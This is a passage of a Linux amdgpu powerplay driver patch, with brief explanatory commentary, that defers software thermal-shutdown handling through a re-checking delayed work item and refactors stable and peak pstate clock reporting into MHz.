++	if (!ret)
++		INIT_DELAYED_WORK(&hwmgr->swctf_delayed_work,
++				  pp_swctf_delayed_work_handler);
++
+ 	return ret;
+ }
+ 
+@@ -136,6 +180,8 @@ static int pp_hw_fini(void *handle)
+ 	struct amdgpu_device *adev = handle;
+ 	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+ 
++	cancel_delayed_work_sync(&hwmgr->swctf_delayed_work);
++
+ 	hwmgr_hw_fini(hwmgr);
+ 
+ 	return 0;
+@@ -222,6 +268,8 @@ static int pp_suspend(void *handle)
+ 	struct amdgpu_device *adev = handle;
+ 	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+ 
++	cancel_delayed_work_sync(&hwmgr->swctf_delayed_work);
++
+ 	return hwmgr_suspend(hwmgr);
+ }
+ 
+@@ -769,10 +817,16 @@ static int pp_dpm_read_sensor(void *handle, int idx,
+ 
+ 	switch (idx) {
+ 	case AMDGPU_PP_SENSOR_STABLE_PSTATE_SCLK:
+-		*((uint32_t *)value) = hwmgr->pstate_sclk;
++		*((uint32_t *)value) = hwmgr->pstate_sclk * 100;
+ 		return 0;
+ 	case AMDGPU_PP_SENSOR_STABLE_PSTATE_MCLK:
+-		*((uint32_t *)value) = hwmgr->pstate_mclk;
++		*((uint32_t *)value) = hwmgr->pstate_mclk * 100;
++		return 0;
++	case AMDGPU_PP_SENSOR_PEAK_PSTATE_SCLK:
++		*((uint32_t *)value) = hwmgr->pstate_sclk_peak * 100;
++		return 0;
++	case AMDGPU_PP_SENSOR_PEAK_PSTATE_MCLK:
++		*((uint32_t *)value) = hwmgr->pstate_mclk_peak * 100;
+ 		return 0;
+ 	case AMDGPU_PP_SENSOR_MIN_FAN_RPM:
+ 		*((uint32_t *)value) = hwmgr->thermal_controller.fanInfo.ulMinRPM;
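
Taken together, these hooks turn SW CTF handling into a debounce: the thermal interrupt (see the smu_helper.c hunk below) no longer powers the machine off directly but merely arms the delayed work, and pp_swctf_delayed_work_handler() re-reads the temperature after the grace period before committing to a shutdown. The arming side reduces to:

/* in the thermal interrupt path: defer instead of immediate poweroff */
schedule_delayed_work(&hwmgr->swctf_delayed_work,
		      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
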
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/hardwaremanager.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/hardwaremanager.c
+index 981dc8c7112d6..90452b66e1071 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/hardwaremanager.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/hardwaremanager.c
+@@ -241,7 +241,8 @@ int phm_start_thermal_controller(struct pp_hwmgr *hwmgr)
+ 		TEMP_RANGE_MAX,
+ 		TEMP_RANGE_MIN,
+ 		TEMP_RANGE_MAX,
+-		TEMP_RANGE_MAX};
++		TEMP_RANGE_MAX,
++		0};
+ 	struct amdgpu_device *adev = hwmgr->adev;
+ 
+ 	if (!hwmgr->not_vf)
+@@ -265,6 +266,7 @@ int phm_start_thermal_controller(struct pp_hwmgr *hwmgr)
+ 	adev->pm.dpm.thermal.min_mem_temp = range.mem_min;
+ 	adev->pm.dpm.thermal.max_mem_crit_temp = range.mem_crit_max;
+ 	adev->pm.dpm.thermal.max_mem_emergency_temp = range.mem_emergency_max;
++	adev->pm.dpm.thermal.sw_ctf_threshold = range.sw_ctf_threshold;
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
+index ede71de2343dc..86d6e88c73862 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
+@@ -375,6 +375,17 @@ static int smu10_enable_gfx_off(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
++static void smu10_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	hwmgr->pstate_sclk = SMU10_UMD_PSTATE_GFXCLK;
++	hwmgr->pstate_mclk = SMU10_UMD_PSTATE_FCLK;
++
++	smum_send_msg_to_smc(hwmgr,
++			     PPSMC_MSG_GetMaxGfxclkFrequency,
++			     &hwmgr->pstate_sclk_peak);
++	hwmgr->pstate_mclk_peak = SMU10_UMD_PSTATE_PEAK_FCLK;
++}
++
+ static int smu10_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	struct amdgpu_device *adev = hwmgr->adev;
+@@ -398,6 +409,8 @@ static int smu10_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 			return ret;
+ 	}
+ 
++	smu10_populate_umdpstate_clocks(hwmgr);
++
+ 	return 0;
+ }
+ 
+@@ -574,9 +587,6 @@ static int smu10_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 
+ 	hwmgr->platform_descriptor.minimumClocksReductionPercentage = 50;
+ 
+-	hwmgr->pstate_sclk = SMU10_UMD_PSTATE_GFXCLK * 100;
+-	hwmgr->pstate_mclk = SMU10_UMD_PSTATE_FCLK * 100;
+-
+ 	/* enable the pp_od_clk_voltage sysfs file */
+ 	hwmgr->od_enabled = 1;
+ 	/* disabled fine grain tuning function by default */
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+index 7ef7e81525a30..a31a62a1ce0b2 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+@@ -1501,6 +1501,67 @@ static int smu7_populate_edc_leakage_registers(struct pp_hwmgr *hwmgr)
+ 	return ret;
+ }
+ 
++static void smu7_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	struct smu7_hwmgr *data = (struct smu7_hwmgr *)(hwmgr->backend);
++	struct smu7_dpm_table *golden_dpm_table = &data->golden_dpm_table;
++	int32_t tmp_sclk, count, percentage;
++
++	if (golden_dpm_table->mclk_table.count == 1) {
++		percentage = 70;
++		hwmgr->pstate_mclk = golden_dpm_table->mclk_table.dpm_levels[0].value;
++	} else {
++		percentage = 100 * golden_dpm_table->sclk_table.dpm_levels[golden_dpm_table->sclk_table.count - 1].value /
++				golden_dpm_table->mclk_table.dpm_levels[golden_dpm_table->mclk_table.count - 1].value;
++		hwmgr->pstate_mclk = golden_dpm_table->mclk_table.dpm_levels[golden_dpm_table->mclk_table.count - 2].value;
++	}
++
++	tmp_sclk = hwmgr->pstate_mclk * percentage / 100;
++
++	if (hwmgr->pp_table_version == PP_TABLE_V0) {
++		struct phm_clock_voltage_dependency_table *vddc_dependency_on_sclk =
++			hwmgr->dyn_state.vddc_dependency_on_sclk;
++
++		for (count = vddc_dependency_on_sclk->count - 1; count >= 0; count--) {
++			if (tmp_sclk >= vddc_dependency_on_sclk->entries[count].clk) {
++				hwmgr->pstate_sclk = vddc_dependency_on_sclk->entries[count].clk;
++				break;
++			}
++		}
++		if (count < 0)
++			hwmgr->pstate_sclk = vddc_dependency_on_sclk->entries[0].clk;
++
++		hwmgr->pstate_sclk_peak =
++			vddc_dependency_on_sclk->entries[vddc_dependency_on_sclk->count - 1].clk;
++	} else if (hwmgr->pp_table_version == PP_TABLE_V1) {
++		struct phm_ppt_v1_information *table_info =
++			(struct phm_ppt_v1_information *)(hwmgr->pptable);
++		struct phm_ppt_v1_clock_voltage_dependency_table *vdd_dep_on_sclk =
++			table_info->vdd_dep_on_sclk;
++
++		for (count = vdd_dep_on_sclk->count - 1; count >= 0; count--) {
++			if (tmp_sclk >= vdd_dep_on_sclk->entries[count].clk) {
++				hwmgr->pstate_sclk = vdd_dep_on_sclk->entries[count].clk;
++				break;
++			}
++		}
++		if (count < 0)
++			hwmgr->pstate_sclk = vdd_dep_on_sclk->entries[0].clk;
++
++		hwmgr->pstate_sclk_peak =
++			vdd_dep_on_sclk->entries[vdd_dep_on_sclk->count - 1].clk;
++	}
++
++	hwmgr->pstate_mclk_peak =
++		golden_dpm_table->mclk_table.dpm_levels[golden_dpm_table->mclk_table.count - 1].value;
++
++	/* make sure the output is in MHz */
++	hwmgr->pstate_sclk /= 100;
++	hwmgr->pstate_mclk /= 100;
++	hwmgr->pstate_sclk_peak /= 100;
++	hwmgr->pstate_mclk_peak /= 100;
++}
++
+ static int smu7_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	int tmp_result = 0;
+@@ -1625,6 +1686,8 @@ static int smu7_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 	PP_ASSERT_WITH_CODE((0 == tmp_result),
+ 			"pcie performance request failed!", result = tmp_result);
+ 
++	smu7_populate_umdpstate_clocks(hwmgr);
++
+ 	return 0;
+ }
+ 
+@@ -3143,15 +3206,12 @@ static int smu7_get_profiling_clk(struct pp_hwmgr *hwmgr, enum amd_dpm_forced_le
+ 		for (count = hwmgr->dyn_state.vddc_dependency_on_sclk->count-1;
+ 			count >= 0; count--) {
+ 			if (tmp_sclk >= hwmgr->dyn_state.vddc_dependency_on_sclk->entries[count].clk) {
+-				tmp_sclk = hwmgr->dyn_state.vddc_dependency_on_sclk->entries[count].clk;
+ 				*sclk_mask = count;
+ 				break;
+ 			}
+ 		}
+-		if (count < 0 || level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK) {
++		if (count < 0 || level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK)
+ 			*sclk_mask = 0;
+-			tmp_sclk = hwmgr->dyn_state.vddc_dependency_on_sclk->entries[0].clk;
+-		}
+ 
+ 		if (level == AMD_DPM_FORCED_LEVEL_PROFILE_PEAK)
+ 			*sclk_mask = hwmgr->dyn_state.vddc_dependency_on_sclk->count-1;
+@@ -3161,15 +3221,12 @@ static int smu7_get_profiling_clk(struct pp_hwmgr *hwmgr, enum amd_dpm_forced_le
+ 
+ 		for (count = table_info->vdd_dep_on_sclk->count-1; count >= 0; count--) {
+ 			if (tmp_sclk >= table_info->vdd_dep_on_sclk->entries[count].clk) {
+-				tmp_sclk = table_info->vdd_dep_on_sclk->entries[count].clk;
+ 				*sclk_mask = count;
+ 				break;
+ 			}
+ 		}
+-		if (count < 0 || level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK) {
++		if (count < 0 || level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK)
+ 			*sclk_mask = 0;
+-			tmp_sclk =  table_info->vdd_dep_on_sclk->entries[0].clk;
+-		}
+ 
+ 		if (level == AMD_DPM_FORCED_LEVEL_PROFILE_PEAK)
+ 			*sclk_mask = table_info->vdd_dep_on_sclk->count - 1;
+@@ -3181,8 +3238,6 @@ static int smu7_get_profiling_clk(struct pp_hwmgr *hwmgr, enum amd_dpm_forced_le
+ 		*mclk_mask = golden_dpm_table->mclk_table.count - 1;
+ 
+ 	*pcie_mask = data->dpm_table.pcie_speed_table.count - 1;
+-	hwmgr->pstate_sclk = tmp_sclk;
+-	hwmgr->pstate_mclk = tmp_mclk;
+ 
+ 	return 0;
+ }
+@@ -3195,9 +3250,6 @@ static int smu7_force_dpm_level(struct pp_hwmgr *hwmgr,
+ 	uint32_t mclk_mask = 0;
+ 	uint32_t pcie_mask = 0;
+ 
+-	if (hwmgr->pstate_sclk == 0)
+-		smu7_get_profiling_clk(hwmgr, level, &sclk_mask, &mclk_mask, &pcie_mask);
+-
+ 	switch (level) {
+ 	case AMD_DPM_FORCED_LEVEL_HIGH:
+ 		ret = smu7_force_dpm_highest(hwmgr);
+@@ -5381,6 +5433,8 @@ static int smu7_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		thermal_data->max = data->thermal_temp_setting.temperature_shutdown *
+ 			PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 
++	thermal_data->sw_ctf_threshold = thermal_data->max;
++
+ 	return 0;
+ }
+ 
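
A unit-bookkeeping note for the pstate refactor in this file: the DPM table entries are in 10 kHz units, the hwmgr->pstate_* fields are now stored in MHz (hence the /= 100 at the end of smu7_populate_umdpstate_clocks()), and pp_dpm_read_sensor() multiplies by 100 on the way out, so the sensor interface keeps its old 10 kHz units. For example, a 1000 MHz stable-pstate sclk sits in the table as 100000, is stored as 1000, and is read back through AMDGPU_PP_SENSOR_STABLE_PSTATE_SCLK as 100000 again.
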
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+index b50fd4a4a3d1a..b015a601b385a 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+@@ -1016,6 +1016,18 @@ static void smu8_reset_acp_boot_level(struct pp_hwmgr *hwmgr)
+ 	data->acp_boot_level = 0xff;
+ }
+ 
++static void smu8_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	struct phm_clock_voltage_dependency_table *table =
++				hwmgr->dyn_state.vddc_dependency_on_sclk;
++
++	hwmgr->pstate_sclk = table->entries[0].clk / 100;
++	hwmgr->pstate_mclk = 0;
++
++	hwmgr->pstate_sclk_peak = table->entries[table->count - 1].clk / 100;
++	hwmgr->pstate_mclk_peak = 0;
++}
++
+ static int smu8_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	smu8_program_voting_clients(hwmgr);
+@@ -1024,6 +1036,8 @@ static int smu8_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 	smu8_program_bootup_state(hwmgr);
+ 	smu8_reset_acp_boot_level(hwmgr);
+ 
++	smu8_populate_umdpstate_clocks(hwmgr);
++
+ 	return 0;
+ }
+ 
+@@ -1167,8 +1181,6 @@ static int smu8_phm_unforce_dpm_levels(struct pp_hwmgr *hwmgr)
+ 
+ 	data->sclk_dpm.soft_min_clk = table->entries[0].clk;
+ 	data->sclk_dpm.hard_min_clk = table->entries[0].clk;
+-	hwmgr->pstate_sclk = table->entries[0].clk;
+-	hwmgr->pstate_mclk = 0;
+ 
+ 	level = smu8_get_max_sclk_level(hwmgr) - 1;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu_helper.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu_helper.c
+index bfe80ac0ad8c8..d0b1ab6c45231 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu_helper.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu_helper.c
+@@ -603,21 +603,17 @@ int phm_irq_process(struct amdgpu_device *adev,
+ 			   struct amdgpu_irq_src *source,
+ 			   struct amdgpu_iv_entry *entry)
+ {
++	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+ 	uint32_t client_id = entry->client_id;
+ 	uint32_t src_id = entry->src_id;
+ 
+ 	if (client_id == AMDGPU_IRQ_CLIENTID_LEGACY) {
+ 		if (src_id == VISLANDS30_IV_SRCID_CG_TSS_THERMAL_LOW_TO_HIGH) {
+-			dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
+-			/*
+-			 * SW CTF just occurred.
+-			 * Try to do a graceful shutdown to prevent further damage.
+-			 */
+-			dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
+-			orderly_poweroff(true);
+-		} else if (src_id == VISLANDS30_IV_SRCID_CG_TSS_THERMAL_HIGH_TO_LOW)
++			schedule_delayed_work(&hwmgr->swctf_delayed_work,
++					      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
++		} else if (src_id == VISLANDS30_IV_SRCID_CG_TSS_THERMAL_HIGH_TO_LOW) {
+ 			dev_emerg(adev->dev, "ERROR: GPU under temperature range detected!\n");
+-		else if (src_id == VISLANDS30_IV_SRCID_GPIO_19) {
++		} else if (src_id == VISLANDS30_IV_SRCID_GPIO_19) {
+ 			dev_emerg(adev->dev, "ERROR: GPU HW Critical Temperature Fault(aka CTF) detected!\n");
+ 			/*
+ 			 * HW CTF just occurred. Shutdown to prevent further damage.
+@@ -626,15 +622,10 @@ int phm_irq_process(struct amdgpu_device *adev,
+ 			orderly_poweroff(true);
+ 		}
+ 	} else if (client_id == SOC15_IH_CLIENTID_THM) {
+-		if (src_id == 0) {
+-			dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
+-			/*
+-			 * SW CTF just occurred.
+-			 * Try to do a graceful shutdown to prevent further damage.
+-			 */
+-			dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
+-			orderly_poweroff(true);
+-		} else
++		if (src_id == 0)
++			schedule_delayed_work(&hwmgr->swctf_delayed_work,
++					      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
++		else
+ 			dev_emerg(adev->dev, "ERROR: GPU under temperature range detected!\n");
+ 	} else if (client_id == SOC15_IH_CLIENTID_ROM_SMUIO) {
+ 		dev_emerg(adev->dev, "ERROR: GPU HW Critical Temperature Fault(aka CTF) detected!\n");
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+index c8c9fb827bda1..d8cd23438b762 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+@@ -3008,6 +3008,30 @@ static int vega10_enable_disable_PCC_limit_feature(struct pp_hwmgr *hwmgr, bool
+ 	return 0;
+ }
+ 
++static void vega10_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	struct phm_ppt_v2_information *table_info =
++			(struct phm_ppt_v2_information *)(hwmgr->pptable);
++
++	if (table_info->vdd_dep_on_sclk->count > VEGA10_UMD_PSTATE_GFXCLK_LEVEL &&
++	    table_info->vdd_dep_on_mclk->count > VEGA10_UMD_PSTATE_MCLK_LEVEL) {
++		hwmgr->pstate_sclk = table_info->vdd_dep_on_sclk->entries[VEGA10_UMD_PSTATE_GFXCLK_LEVEL].clk;
++		hwmgr->pstate_mclk = table_info->vdd_dep_on_mclk->entries[VEGA10_UMD_PSTATE_MCLK_LEVEL].clk;
++	} else {
++		hwmgr->pstate_sclk = table_info->vdd_dep_on_sclk->entries[0].clk;
++		hwmgr->pstate_mclk = table_info->vdd_dep_on_mclk->entries[0].clk;
++	}
++
++	hwmgr->pstate_sclk_peak = table_info->vdd_dep_on_sclk->entries[table_info->vdd_dep_on_sclk->count - 1].clk;
++	hwmgr->pstate_mclk_peak = table_info->vdd_dep_on_mclk->entries[table_info->vdd_dep_on_mclk->count - 1].clk;
++
++	/* make sure the output is in MHz */
++	hwmgr->pstate_sclk /= 100;
++	hwmgr->pstate_mclk /= 100;
++	hwmgr->pstate_sclk_peak /= 100;
++	hwmgr->pstate_mclk_peak /= 100;
++}
++
+ static int vega10_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega10_hwmgr *data = hwmgr->backend;
+@@ -3082,6 +3106,8 @@ static int vega10_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 				    result = tmp_result);
+ 	}
+ 
++	vega10_populate_umdpstate_clocks(hwmgr);
++
+ 	return result;
+ }
+ 
+@@ -4169,8 +4195,6 @@ static int vega10_get_profiling_clk_mask(struct pp_hwmgr *hwmgr, enum amd_dpm_fo
+ 		*sclk_mask = VEGA10_UMD_PSTATE_GFXCLK_LEVEL;
+ 		*soc_mask = VEGA10_UMD_PSTATE_SOCCLK_LEVEL;
+ 		*mclk_mask = VEGA10_UMD_PSTATE_MCLK_LEVEL;
+-		hwmgr->pstate_sclk = table_info->vdd_dep_on_sclk->entries[VEGA10_UMD_PSTATE_GFXCLK_LEVEL].clk;
+-		hwmgr->pstate_mclk = table_info->vdd_dep_on_mclk->entries[VEGA10_UMD_PSTATE_MCLK_LEVEL].clk;
+ 	}
+ 
+ 	if (level == AMD_DPM_FORCED_LEVEL_PROFILE_MIN_SCLK) {
+@@ -4281,9 +4305,6 @@ static int vega10_dpm_force_dpm_level(struct pp_hwmgr *hwmgr,
+ 	uint32_t mclk_mask = 0;
+ 	uint32_t soc_mask = 0;
+ 
+-	if (hwmgr->pstate_sclk == 0)
+-		vega10_get_profiling_clk_mask(hwmgr, level, &sclk_mask, &mclk_mask, &soc_mask);
+-
+ 	switch (level) {
+ 	case AMD_DPM_FORCED_LEVEL_HIGH:
+ 		ret = vega10_force_dpm_highest(hwmgr);
+@@ -5221,6 +5242,9 @@ static int vega10_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ {
+ 	struct vega10_hwmgr *data = hwmgr->backend;
+ 	PPTable_t *pp_table = &(data->smc_state_table.pp_table);
++	struct phm_ppt_v2_information *pp_table_info =
++		(struct phm_ppt_v2_information *)(hwmgr->pptable);
++	struct phm_tdp_table *tdp_table = pp_table_info->tdp_table;
+ 
+ 	memcpy(thermal_data, &SMU7ThermalWithDelayPolicy[0], sizeof(struct PP_TemperatureRange));
+ 
+@@ -5237,6 +5261,13 @@ static int vega10_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 	thermal_data->mem_emergency_max = (pp_table->ThbmLimit + CTF_OFFSET_HBM)*
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 
++	if (tdp_table->usSoftwareShutdownTemp > pp_table->ThotspotLimit &&
++	    tdp_table->usSoftwareShutdownTemp < VEGA10_THERMAL_MAXIMUM_ALERT_TEMP)
++		thermal_data->sw_ctf_threshold = tdp_table->usSoftwareShutdownTemp;
++	else
++		thermal_data->sw_ctf_threshold = VEGA10_THERMAL_MAXIMUM_ALERT_TEMP;
++	thermal_data->sw_ctf_threshold *= PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
+index a2f4d6773d458..1069eaaae2f82 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
+@@ -1026,6 +1026,25 @@ static int vega12_get_all_clock_ranges(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
++static void vega12_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
++{
++	struct vega12_hwmgr *data = (struct vega12_hwmgr *)(hwmgr->backend);
++	struct vega12_single_dpm_table *gfx_dpm_table = &(data->dpm_table.gfx_table);
++	struct vega12_single_dpm_table *mem_dpm_table = &(data->dpm_table.mem_table);
++
++	if (gfx_dpm_table->count > VEGA12_UMD_PSTATE_GFXCLK_LEVEL &&
++	    mem_dpm_table->count > VEGA12_UMD_PSTATE_MCLK_LEVEL) {
++		hwmgr->pstate_sclk = gfx_dpm_table->dpm_levels[VEGA12_UMD_PSTATE_GFXCLK_LEVEL].value;
++		hwmgr->pstate_mclk = mem_dpm_table->dpm_levels[VEGA12_UMD_PSTATE_MCLK_LEVEL].value;
++	} else {
++		hwmgr->pstate_sclk = gfx_dpm_table->dpm_levels[0].value;
++		hwmgr->pstate_mclk = mem_dpm_table->dpm_levels[0].value;
++	}
++
++	hwmgr->pstate_sclk_peak = gfx_dpm_table->dpm_levels[gfx_dpm_table->count - 1].value;
++	hwmgr->pstate_mclk_peak = mem_dpm_table->dpm_levels[mem_dpm_table->count - 1].value;
++}
++
+ static int vega12_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ {
+ 	int tmp_result, result = 0;
+@@ -1077,6 +1096,9 @@ static int vega12_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 	PP_ASSERT_WITH_CODE(!result,
+ 			"Failed to setup default DPM tables!",
+ 			return result);
++
++	vega12_populate_umdpstate_clocks(hwmgr);
++
+ 	return result;
+ }
+ 
+@@ -2742,6 +2764,8 @@ static int vega12_notify_cac_buffer_info(struct pp_hwmgr *hwmgr,
+ static int vega12_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		struct PP_TemperatureRange *thermal_data)
+ {
++	struct phm_ppt_v3_information *pptable_information =
++		(struct phm_ppt_v3_information *)hwmgr->pptable;
+ 	struct vega12_hwmgr *data =
+ 			(struct vega12_hwmgr *)(hwmgr->backend);
+ 	PPTable_t *pp_table = &(data->smc_state_table.pp_table);
+@@ -2760,6 +2784,8 @@ static int vega12_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 	thermal_data->mem_emergency_max = (pp_table->ThbmLimit + CTF_OFFSET_HBM)*
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
++	thermal_data->sw_ctf_threshold = pptable_information->us_software_shutdown_temp *
++		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+index b30684c84e20e..ff77a3683efd5 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+@@ -1555,26 +1555,23 @@ static int vega20_set_mclk_od(
+ 	return 0;
+ }
+ 
+-static int vega20_populate_umdpstate_clocks(
+-		struct pp_hwmgr *hwmgr)
++static void vega20_populate_umdpstate_clocks(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega20_hwmgr *data = (struct vega20_hwmgr *)(hwmgr->backend);
+ 	struct vega20_single_dpm_table *gfx_table = &(data->dpm_table.gfx_table);
+ 	struct vega20_single_dpm_table *mem_table = &(data->dpm_table.mem_table);
+ 
+-	hwmgr->pstate_sclk = gfx_table->dpm_levels[0].value;
+-	hwmgr->pstate_mclk = mem_table->dpm_levels[0].value;
+-
+ 	if (gfx_table->count > VEGA20_UMD_PSTATE_GFXCLK_LEVEL &&
+ 	    mem_table->count > VEGA20_UMD_PSTATE_MCLK_LEVEL) {
+ 		hwmgr->pstate_sclk = gfx_table->dpm_levels[VEGA20_UMD_PSTATE_GFXCLK_LEVEL].value;
+ 		hwmgr->pstate_mclk = mem_table->dpm_levels[VEGA20_UMD_PSTATE_MCLK_LEVEL].value;
++	} else {
++		hwmgr->pstate_sclk = gfx_table->dpm_levels[0].value;
++		hwmgr->pstate_mclk = mem_table->dpm_levels[0].value;
+ 	}
+ 
+-	hwmgr->pstate_sclk = hwmgr->pstate_sclk * 100;
+-	hwmgr->pstate_mclk = hwmgr->pstate_mclk * 100;
+-
+-	return 0;
++	hwmgr->pstate_sclk_peak = gfx_table->dpm_levels[gfx_table->count - 1].value;
++	hwmgr->pstate_mclk_peak = mem_table->dpm_levels[mem_table->count - 1].value;
+ }
+ 
+ static int vega20_get_max_sustainable_clock(struct pp_hwmgr *hwmgr,
+@@ -1753,10 +1750,7 @@ static int vega20_enable_dpm_tasks(struct pp_hwmgr *hwmgr)
+ 			"[EnableDPMTasks] Failed to initialize odn settings!",
+ 			return result);
+ 
+-	result = vega20_populate_umdpstate_clocks(hwmgr);
+-	PP_ASSERT_WITH_CODE(!result,
+-			"[EnableDPMTasks] Failed to populate umdpstate clocks!",
+-			return result);
++	vega20_populate_umdpstate_clocks(hwmgr);
+ 
+ 	result = smum_send_msg_to_smc_with_parameter(hwmgr, PPSMC_MSG_GetPptLimit,
+ 			POWER_SOURCE_AC << 16, &hwmgr->default_power_limit);
+@@ -4213,6 +4207,8 @@ static int vega20_notify_cac_buffer_info(struct pp_hwmgr *hwmgr,
+ static int vega20_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		struct PP_TemperatureRange *thermal_data)
+ {
++	struct phm_ppt_v3_information *pptable_information =
++		(struct phm_ppt_v3_information *)hwmgr->pptable;
+ 	struct vega20_hwmgr *data =
+ 			(struct vega20_hwmgr *)(hwmgr->backend);
+ 	PPTable_t *pp_table = &(data->smc_state_table.pp_table);
+@@ -4231,6 +4227,8 @@ static int vega20_get_thermal_temperature_range(struct pp_hwmgr *hwmgr,
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 	thermal_data->mem_emergency_max = (pp_table->ThbmLimit + CTF_OFFSET_HBM)*
+ 		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
++	thermal_data->sw_ctf_threshold = pptable_information->us_software_shutdown_temp *
++		PP_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/inc/hwmgr.h b/drivers/gpu/drm/amd/pm/powerplay/inc/hwmgr.h
+index 27f8d0e0e6a8c..ec10643edea3e 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/inc/hwmgr.h
++++ b/drivers/gpu/drm/amd/pm/powerplay/inc/hwmgr.h
+@@ -809,6 +809,10 @@ struct pp_hwmgr {
+ 	uint32_t workload_prority[Workload_Policy_Max];
+ 	uint32_t workload_setting[Workload_Policy_Max];
+ 	bool gfxoff_state_changed_by_workload;
++	uint32_t pstate_sclk_peak;
++	uint32_t pstate_mclk_peak;
++
++	struct delayed_work swctf_delayed_work;
+ };
+ 
+ int hwmgr_early_init(struct pp_hwmgr *hwmgr);
